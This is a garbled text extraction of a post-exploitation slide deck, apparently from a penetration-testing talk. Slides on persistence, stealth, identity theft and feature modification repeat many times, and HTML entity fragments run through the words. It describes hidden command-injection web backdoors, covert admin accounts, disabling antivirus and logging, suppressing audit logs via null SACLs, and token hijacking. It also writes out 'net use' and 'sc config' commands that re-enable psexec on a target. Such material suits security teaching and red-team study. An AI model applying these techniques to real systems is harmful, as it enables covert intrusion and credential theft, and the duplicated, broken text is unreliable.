bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 26

Persistence

bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form

fieldsndash If Name = John Smith and Age = 42 then execute

contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to

find

Slide 27

Persistence

bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation

Slide 28

Persistence

bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access

bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)

bull Only use AT to run your commandsbull Persistence without adding files new accounts

ndash Unlikely to be discovered

Slide 29

bull DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 27

Persistence

bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation

Slide 28

Persistence

bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access

bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)

bull Only use AT to run your commandsbull Persistence without adding files new accounts

ndash Unlikely to be discovered

Slide 29

bull DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 28

Persistence

bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access

bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)

bull Only use AT to run your commandsbull Persistence without adding files new accounts

ndash Unlikely to be discovered

Slide 29

bull DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 29

bull DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

